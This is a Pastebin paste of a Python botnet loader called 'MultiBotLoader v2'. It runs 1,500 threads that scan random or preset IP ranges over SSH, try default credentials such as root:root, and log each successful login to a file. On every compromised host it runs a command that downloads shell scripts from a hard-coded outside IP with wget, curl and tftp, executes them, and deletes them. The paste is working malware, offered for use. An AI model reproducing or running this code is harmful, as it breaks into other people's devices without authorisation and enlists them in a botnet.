Advertisement
Guest User

Untitled

a guest
Dec 26th, 2016
104
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 7.24 KB | None | 0 0
  1. #!/usr/bin/env python
  2. # -*- coding: utf-8 -*-
  3. from datetime import datetime
  4. import threading, paramiko, random, socket, time, sys
  5. paramiko.util.log_to_file("/dev/null")
  6.  
  7. #USAGE : Multiscanner.py 1000 RANGE1 1 1
  8.  
  9. cmd='cd /tmp; wget http://185.44.78.207/gtop.sh || curl -O http://185.44.78.207/gtop.sh; chmod 777 gtop.sh; sh gtop.sh; busybox tftp 185.44.78.207 -c get tftp1.sh; chmod 777 tftp1.sh; sh tftp1.sh; busybox tftp -r tftp2.sh -g 185.44.78.207; chmod 777 tftp2.sh; sh tftp2.sh; rm -rf gtop.sh tftp1.sh tftp2.sh'
  10.  
  11. blacklist = [
  12. '127'
  13. ]
  14.  
  15. passwords = [
  16. ""
  17. ""
  18. ]
  19.  
  20. if sys.argv[4] == '1':
  21. passwords = ["telnet:telnet", "adminpldt:1234567890", "admin:1234", "root:root", "guest:guest"]
  22. if sys.argv[4] == '2':
  23. passwords = [""]
  24. if sys.argv[4] == '3':
  25. passwords = [""]
  26. if sys.argv[4] == '4':
  27. passwords = [""]
  28.  
  29. ascii = '\x1b[1;32m'
  30. ascii +='\x1b[32m'##############################################################################
  31. ascii +=' +------+ +-++-+ +-++-+ +------+ \r\n'#
  32. ascii +=' ~ [ MultiBotLoader v2 ] ~ \r\n'#
  33. ascii +=' ~ Remade by SA7AN From Public Scanners ~ \r\n'#
  34. ascii +=' +------+ +-++-+ +-++-+ +------+ \r\n'#
  35. ascii +='\x1b[32m'##############################################################################
  36. print ''
  37. print ''
  38. print ''
  39. print ascii
  40. print '\x1b[38m Wait For The Bots To Load If Its Taking Ages Change Your Ranges\x1b[0m'
  41. print ''
  42. print ''
  43.  
  44. ipclassinfo = sys.argv[2]
  45. if ipclassinfo == "A":
  46. ip1 = sys.argv[3]
  47. elif ipclassinfo == "B":
  48. ip1 = sys.argv[3].split(".")[0]
  49. ip2 = sys.argv[3].split(".")[1]
  50. elif ipclassinfo == "C":
  51. ips = sys.argv[3].split(".")
  52. num=0
  53. for ip in ips:
  54. num=num+1
  55. if num == 1:
  56. ip1 = ip
  57. elif num == 2:
  58. ip2 = ip
  59. elif num == 3:
  60. ip3 = ip
  61. class sshscanner(threading.Thread):
  62. global passwords
  63. global ipclassinfo
  64. if ipclassinfo == "A":
  65. global ip1
  66. elif ipclassinfo == "B":
  67. global ip1
  68. global ip2
  69. elif ipclassinfo == "C":
  70. global ip1
  71. global ip2
  72. global ip3
  73. def run(self):
  74. while 1:
  75. try:
  76. while 1:
  77. thisipisbad='no'
  78. if ipclassinfo == "A":
  79. self.host = ip1+'.'+str(random.randrange(0,256))+'.'+str(random.randrange(0,256))+'.'+str(random.randrange(0,256))
  80. elif ipclassinfo == "B":
  81. self.host = ip1+'.'+ip2+'.'+str(random.randrange(0,256))+'.'+str(random.randrange(0,256))
  82. elif ipclassinfo == "C":
  83. self.host = ip1+'.'+ip2+'.'+ip3+'.'+str(random.randrange(0,256))
  84. elif ipclassinfo == "TEST":
  85. test = ["118.174"]
  86. self.host = random.choice(test)+'.'+str(random.randrange(0,256))+'.'+str(random.randrange(0,256))
  87. elif ipclassinfo == "RANGE3":
  88. yeet = ["122","131","161","37","186","187","31","188","201","2","200"]
  89. self.host = random.choice(yeet)+'.'+str(random.randrange(0,256))+'.'+str(random.randrange(0,256))+'.'+str(random.randrange(0,256))
  90. elif ipclassinfo == "RANGE1":
  91. lucky = ["119.93", "49.145", "125.24", "118.172", "122.54", "120.16", "101.112", "182.64", "125.27", "182.59", "177.44", "113.53", "110.227", "182.69"]
  92. self.host = random.choice(lucky)+'.'+str(random.randrange(0,256))+'.'+str(random.randrange(0,256))
  93. elif ipclassinfo == "RANGE4":
  94. lucky2 = [ "122.3","122.52","122.54","119.93","124.105","124.105","110.227","37.13","201.255", "182.65", "1.0", "101.108", "110.227", "177.137", "49.145", "119.93", "49.144", "122.54", "122.52", "122.3", "122.3", "122.52", "122.54", "119.93", "124.105", "124.105", "110.227","119.93", "49.145", "125.24", "118.172", "122.54", "120.16", "101.112", "182.64", "125.27", "182.59", "177.44", "113.53", "110.227", "182.69"]
  95. self.host = random.choice(lucky2)+'.'+str(random.randrange(0,256))+'.'+str(random.randrange(0,256))
  96. elif ipclassinfo == "LUCKY3":
  97. lucky2 = [ "103.20","103.30","103.47","103.57" ]
  98. self.host = random.choice(lucky2)+'.'+str(random.randrange(0,256))+'.'+str(random.randrange(0,256))
  99. elif ipclassinfo == "RAND":
  100. self.host = str(random.randrange(0,256))+'.'+str(random.randrange(0,256))+'.'+str(random.randrange(0,256))+'.'+str(random.randrange(0,256))
  101. elif ipclassinfo == "INTERNET":
  102. lol = ["1"]
  103. self.host = random.choice(lol)+'.'+str(random.randrange(0,256))+'.'+str(random.randrange(0,256))+'.'+str(random.randrange(0,256))
  104. else:
  105. self.host = str(random.randrange(0,256))+'.'+str(random.randrange(0,256))+'.'+str(random.randrange(0,256))+'.'+str(random.randrange(0,256))
  106. for badip in blacklist:
  107. if badip in self.host:
  108. thisipisbad='yes'
  109. if thisipisbad=='no':
  110. break
  111. username='root'
  112. password=""
  113. port = 22
  114. s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
  115. s.settimeout(3)
  116. s.connect((self.host, port))
  117. s.close()
  118. ssh = paramiko.SSHClient()
  119. ssh.set_missing_host_key_policy(paramiko.AutoAddPolicy())
  120. dobreak=False
  121. for passwd in passwords:
  122. if ":n/a" in passwd:
  123. password=""
  124. else:
  125. password=passwd.split(":")[1]
  126. if "n/a:" in passwd:
  127. username=""
  128. else:
  129. username=passwd.split(":")[0]
  130. try:
  131. ssh.connect(self.host, port = port, username=username, password=password, timeout=3)
  132. dobreak=True
  133. break
  134. except:
  135. pass
  136. if True == dobreak:
  137. break
  138. badserver=True
  139. stdin, stdout, stderr = ssh.exec_command("/sbin/ifconfig")
  140. output = stdout.read()
  141. if "inet addr" in output:
  142. badserver=False
  143. if badserver == False:
  144. print '\x1b[31mBot Connected Successful at \x1b[34m('+datetime.now().strftime('%Y-%m-%d %H:%M:%S')+') #PASSWORD# == '+self.host+'|'+username+'|'+password
  145. ssh.exec_command(""+cmd+"")
  146. scanned = open("success.txt", "a").write(username + ":" + password + ":" + self.host + "\n")
  147. time.sleep(15)
  148. ssh.close()
  149. except:
  150. pass
  151.  
  152. for x in range(0,1500):
  153. try:
  154. t = sshscanner()
  155. t.start()
  156. except:
  157. pass
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement